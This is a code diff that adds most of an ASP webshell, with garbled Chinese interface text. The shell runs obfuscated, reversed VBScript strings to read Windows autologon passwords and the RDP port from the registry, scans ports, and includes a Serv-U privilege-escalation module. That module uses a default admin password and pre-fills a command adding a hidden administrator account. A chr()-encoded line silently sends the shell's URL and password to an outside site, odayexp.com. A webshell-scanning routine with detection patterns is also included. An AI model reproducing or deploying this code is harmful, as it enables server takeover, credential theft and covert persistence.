+	  RRS SI
+	End If
+  End Function
+  Function NewFolder(Path)
+    If Not CF.FolderExists(Path) and Path<>"" Then
+	  CF.CreateFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"�½��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If
+  End Function
+End Class
+sub getTerminalInfo()
+On Error Resume Next
+ShiSan="����>lo/<�� SRR��fI dnE���>rb<�� & drowssaPnigoLotua & �� :���ܻ��ʵ�¼�Ƕ��ԩ� SRR��fI dnE���eslaF�� SRR��raelC.rrE��nehT rrE fI��)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua���>rb<�� & emanresUnigoLotua & �� :����ͳϵ��¼�Ƕ��ԩ� SRR��)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua��eslE���>/rb<����δ�ܹ�¼�Ƕ���ͳϵ�� SRR��nehT 0 = elbanEnigoLotuAsi fI��)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi���drowssaPtluafeD�� = yeKssaPnigoLotua���emaNresUtluafeD�� = yeKresUnigoLotua���nogoLnimdAotuA�� = yeKelbanEnigoLotua���\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH�� = htaPnigoLotua��fI dnE���>/rb<�� & troPmret & �� :�ڶ��������ǰ���� SRR��eslE ���>/rb<.���޵��ܾ��ѷ�����Ȩ����� ,�ڶ�������յ��÷��ީ�SRR�� nehT 0 >< rebmuN.rrE rO ��� = troPmret fI���>lo<>/rh<¼�Ƕ��Լ��ڶ�������թ� SRR��)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret���rebmuNtroP�� = yeKtroPlanimret���\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH�� = htaPtroPlanimret��drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD��yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD��troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Sub
+sub ReadREG()
+RRS "ע�����ֵ��ȡ:<hr/>"
+RRS "<form method=post>"
+RRS "<input type=hidden value=readReg name=theAct>"
+RRS "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
+RRS " <input type=submit value=' ��ȡ '>"
+RRS "<span id=regeditInfo style='display:none;'><hr/>"
+RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {����ʾ�ϴε�¼�û�}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=ȱʡ,1=�����û��޷��оٱ����û��б�,2=�����û��޷����ӱ���IPC$����}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {��ֹĬ�Ϲ���}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 {�ر����繲��}<br/>"
+RRS "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {����TCP/IPɸѡ(����������)}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {����IP·��}<br/>"
+RRS "-------�����ƺ�Ҫ���󶨵�����,��֪���Ƿ�׼ȷ---------<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {Ĭ������}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {��DNS}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {������TCP/IP�˿�}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {������UDP�˿�}<br/>"
+RRS "-----------OVER--------------------<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {����������}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {��ǰ����������(��������滻)}<br/>"
+RRS "</span>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+ShiSan="��fI dnE��yarrAeht & ��>il<�� SRR��eslE ��txeN��)i(yarrAeht & ��>il<�� SRR��)yarrAeht(dnuoBU oT 0=i roF��nehT )yarrAeht(yarrAsI fI��)htaPeht(daeRgeR.Xsw=yarrAeht��)��htaPeht��(tseuqeR=htaPeht��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS"
+ExeCuTe(ShiSanFun(ShiSan))
+end if
+end sub
+sub ScanPort()
+Server.ScriptTimeout = 7776000
+if request.Form("port")="" then
+PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
+else
+PortList=request.Form("port")
+end if
+if request.Form("ip")="" then
+IP="127.0.0.1"
+else
+IP=request.Form("ip")
+end if
+RRS"<p>�˿�ɨ����(���ɨ�����˿�,�ٶȱȽ���,�����Ƽ�ʹ��CMD)</p>"
+RRS"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
+RRS"<p>Scan IP:&nbsp;"
+RRS" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
+RRS"<br>Port List:"
+RRS"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
+RRS"<br><br>"
+RRS"<input name='submit' type='submit' class='buttom' value=' scan '>"
+RRS"<input name='scan' type='hidden' id='scan' value='111'>"
+RRS"</p></form>"
+If request.Form("scan") <> "" Then
+ShiSan="���s ��&emiteht&�� ni ssecorP>rh<��SRR��))1remit-2remit(tni(rtsc=emiteht��remit = 2remit��txeN��fI dnE��txeN��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(SRR��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(SRR��eslE��txeN��)j,xxx & tratSpi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,xxx & tratSpi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��))��-��,)uh(pi(rtSnI-))uh(pi(neL,1+)��-��,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)��.��,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF��))��.��,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi��eslE��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(SRR��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(SRR��eslE��txeN��)j ,)uh(pi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,)uh(pi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��nehT 0 = )��-��,)uh(pi(rtSnI fI��)pi(dnuobU ot 0 = uh roF��)��,��,)��pi��(mroF.tseuqer(tilpS = pi��)��,��,)��trop��(mroF.tseuqer(tilpS = pmt��)��>rh<>rb<>b/<:�汨��ɨ>b<��(SRR��remit = 1remit"
+ExeCuTe(ShiSanFun(ShiSan))
+END IF
+end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)
+Sub Scan(targetip, portNum)
+	On Error Resume Next
+	set conn = Server.CreateObject("ADODB.connection")
+	connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
+	conn.ConnectionTimeout = 1
+	conn.open connstr
+	If Err Then
+		If Err.number = -2147217843 or Err.number = -2147467259 Then
+			If InStr(Err.description, "(Connect()).") > 0 Then
+				RRS(targetip & ":" & portNum & ".........�ر�<br>")
+			Else
+				RRS(targetip & ":" & portNum & ".........<font color=red>����</font><br>")
+			End If
+		End If
+	End If
+End Sub
+Select Case Action
+  Case "MainMenu":MainMenu()
+  Case "getTerminalInfo":getTerminalInfo()
+  Case "PageAddToMdb":PageAddToMdb()
+  case "ScanPort":ScanPort()
+  Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+   f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+ShiSan="����>tpircs/<��SRR���;)0004,';)(timbus.nusdlog.lla.tnemucod'(tuoemiTtes��SRR���;)'>retnec<...��&ssap&�壺���,��&resu&�� :��������ʹ,��&trop&��:1.0.0.721 ��������>retnec<'(etirw.tnemucod��SRR���>'tpircsavaj'=egaugnal tpircs<��SRR���>mrof/<>'2'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<��SRR���>'05'=ezis '��&f&��'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<��SRR���>'05'=ezis '��&dmc&��'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<��SRR���>dt/<>'��&trop&��'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<��SRR���>dt/<>'��&ssap&��'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<��SRR���>dt/<>'��&resu&��'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<��SRR���>'nusdlog'=eman 'tsop'=dohtem mrof<��SRR��a=)��a��(noisses tes��tiuq & resuwen & niamodwen & niamodled & tm & ssapnigol & resunigol dnes.a���� ,��� ,eurT,��1s/nimdapu/nusdlog/�� & trop & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.a��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=a tes"
+ExeCuTe(ShiSanFun(ShiSan))
+case 2
+ShiSan="����>tpircs/<��SRR���;)0004,���;)(timbus.nusdlog.lla.tnemucod���(tuoemiTtes��SRR���;)'>retnec<,...������,��Ȩ��������>retnec<'(etirw.tnemucod��SRR���>'tpircsavaj'=egaugnal tpircs<��SRR���>mrof/<>'3'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<��SRR���>'05'=ezis '��&f&��'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<��SRR���>'05'=ezis '��&dmc&��'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<��SRR���>dt/<>'��&trop&��'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<��SRR���>dt/<>'��&ssap&��'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<��SRR���>dt/<>'��&resu&��'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<��SRR���>'nusdlog'=eman 'tsop'=dohtem mrof<��SRR��b=)��b��(noisses tes ��tiuq & fLrCbv & dmc & �� cexe etis�� & fLrCbv & ��do ssap�� & fLrCbv & ��og resU�� dnes.b���� ,��� ,eurT ,��2s/nimdapu/nusdlog/�� & tropptf & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.b��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=b tes"
+ExeCuTe(ShiSanFun(ShiSan))
+
+case 3
+ShiSan="����>retnec/<��SRR���>���;'uvreS=noitcA?'=ferh.noitacol���=kcilCno ' ���̻ط� '=eulav nottub=epyt tupni<��SRR���>rb<>rb<>tnof/<��&dmc&��>der=roloc tnof<>rb<����������ִ��,����Ȩ��>retnec<��SRR��c=)��c��(noisses tes��tiuq & niamodled & tm & ssapnigol & resunigol dnes.c���� ,��� ,eurT ,��3s/nimdapu/nusdlog/�� & trop & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.c��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=c tes"
+ExeCuTe(ShiSanFun(ShiSan))
+case else
+on error resume next
+    set a=session("a")
+    set b=session("b")
+    set c=session("c")
+    a.abort
+    Set a = Nothing
+    b.abort
+    Set b = Nothing
+    c.abort
+    Set c = Nothing
+RRS"<center><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP�� 6.2</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"    <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"  </tr>"
+RRS"  <tr align='center' valign='middle'>"
+RRS"    <td>�����</td>"
+RRS"    <td><input name='c' type='text' id='c' value='cmd /c net user huohu$ huohu /add & net localgroup administrators huohu$ /add' size='50'></td>"
+RRS"  </tr>"
+RRS" <tr align='center' valign='middle'>"
+RRS"    <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+
+
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+  Case "kmuma"
+	dim Report
+	if request.QueryString("act")<>"scan" then
+	  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+		RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+
+		RRS "<form action=""?Action=kmuma&act=scan"" method=""post"" name=""form1"">"
+		RRS "<p><b>������Ҫ����·����</b>"
+		RRS "<input name=""path"" type=""text"" style=""border:1px solid #999"" value=""."" size=""30"" /> �\����վ��Ŀ¼����.��Ϊ������Ŀ¼<br><br>"
+		RRS "��Ҫ��ʲô: <input class=c name=""radiobutton"" type=""radio"" value=""sws"" onClick=""document.getElementById('showFile1').style.display='none'"" checked>��ASP "
+		RRS "<input class=c type=""radio"" name=""radiobutton"" value=""sf"" onClick=""document.getElementById('showFile1').style.display=''"">������������֮�ļ�<br>"
+		RRS "<br /><div id=""showFile1"" style=""display:none"">"
+		RRS "&nbsp;&nbsp;�������ݣ�<input name=""Search_Content"" type=""text"" id=""Search_Content"" style=""border:1px solid #999"" size=""20"">"
+		RRS " Ҫ���ҵ��ַ����������ֻ�������ڼ��<br />"
+		RRS "&nbsp;&nbsp;�޸����ڣ�<input name=""Search_Date"" type=""text"" style=""border:1px solid #999"" value="""&Left(Now(),InStr(now()," ")-1)&""" size=""20""> ���������;����������������д <a href=""#"" onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
+		RRS "&nbsp;&nbsp;�ļ����ͣ�<input name=""Search_FileExt"" type=""text"" style=""border:1px solid #999"" value=""*"" size=""20""> ����֮����,������*��ʾ��������<br /><br /></div>"
+		RRS "<input type=""submit"" value="" ��ʼɨ�� "" style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px 2px;margin:4px;"" />"
+		RRS "</form>"
+	else
+		if request.Form("path")="" then
+			RRS("·������Ϊ��")
+			response.End()
+		end if
+		if request.Form("path")="\" then
+			TmpPath = Server.MapPath("\")
+		elseif request.Form("path")="." then
+			TmpPath = Server.MapPath(".")
+		else
+			TmpPath = request.Form("path")
+		end if
+		
+		timer1 = timer
+		Sun = 0
+		SumFiles = 0
+		SumFolders = 1
+		If request.Form("radiobutton") = "sws" Then
+			DimFileExt = "asp,cer,asa,cdx"
+			Call ShowAllFile(TmpPath)
+		Else
+			If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
+				RRS("������������ȫ<br><br><a href='javascript:history.go(-1);'>�뷵����������</a>")
+				response.End()
+			End If
+			DimFileExt = request.Form("Search_fileExt")
+			Call ShowAllFile2(TmpPath)
+		End If
+RRS "<table width=""100%"" border=""0"" cellpadding=""0"" cellspacing=""0"" style='font-size:12px'>"
+RRS "<tr><th>Scan WebShell -- ʮ���Ż���</tr>"
+RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-size:12px"">"
+RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid #89441f;padding:4px;display:none""></div>"
+RRS "ɨ����ϣ�һ������ļ���<font color=""#FF0000"">"&SumFolders&"</font>�����ļ�<font color=""#FF0000"">"&SumFiles&"</font>�������ֿ��ɵ�<font color=""#FF0000"">"&Sun&"</font>��"
+RRS "<table width=""100%"" border=""1"" cellpadding=""0"" cellspacing=""8"" bordercolor=""#999999"" style=""font-size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
+If request.Form("radiobutton") = "sws" Then
+	RRS "<td width=""20%"">�ļ����·��</td>"
+	RRS "<td width=""20%"">������</td>"
+	RRS "<td width=""40%"">����</td>"
+	RRS "<td width=""20%"">����/�޸�ʱ��</td>"
+else   
+	RRS "<td width=""50%"">�ļ����·��</td>"
+	RRS "<td width=""25%"">�ļ�����ʱ��</td>"
+	RRS "<td width=""25%"">�޸�ʱ��</td>"
+end if
+	RRS "</tr>"
+	RRS Report
+	RRS "<br/></table>"
+timer2 = timer
+thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
+RRS "<br><font style='font-size:12px'>��ҳִ�й�����"&thetime&"����</font>"
+	end if
+Sub ShowAllFile(Path)
+	Set F1SO = CreateObject("Scripting.FileSystemObject")
+	if not F1SO.FolderExists(path) then exit sub
+	Set f = F1SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call ScanFile(Path&Temp&"\"&myfile.name, "")
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F1SO = Nothing
+End Sub
+Sub ScanFile(FilePath, InFile)
+Server.ScriptTimeout=999999999
+	If InFile <> "" Then
+		Infiles = "<font color=red>���ļ���<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(InFile)&""" target=_blank>"& InFile & "</a>�ļ�����ִ��</font>"
+	End If
+	Set FSO1s = CreateObject("Scripting.FileSystemObject")
+	on error resume next
+	set ofile = FSO1s.OpenTextFile(FilePath)
+	filetxt = Lcase(ofile.readall())
+	If err Then Exit Sub end if
+	if len(filetxt)>0 then
+		filetxt = vbcrlf & filetxt
+		temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+			If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell ���� clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font color=red>Σ�������һ�㱻ASPľ����</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End if
+			If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application ���� clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font color=red>Σ�������һ�㱻ASPľ����</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			Set regEx = New RegExp
+			regEx.IgnoreCase = True
+			regEx.Global = True
+			regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>(vbscript|jscript|javascript).Encode</td><td><font color=red>�ƺ��ű���������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\bEv"&"al\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()��������ִ������ASP����<br>����javascript������Ҳ����ʹ�ã��п������󱨡�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "[^.]\bExe"&"cute\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font color=red>e"&"xecute()��������ִ������ASP����</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.(Open|Create)TextFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>ʹ����FSO��CreateTextFile|OpenTextFile��д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.SaveToFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>ʹ����Stream��SaveToFile����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.Save\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.Save</td><td>ʹ����XMLHTTP��Save����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*virtual\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Server.MapPath("\")&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()[^""]\)"
+		If regEx.Test(filetxt) Then
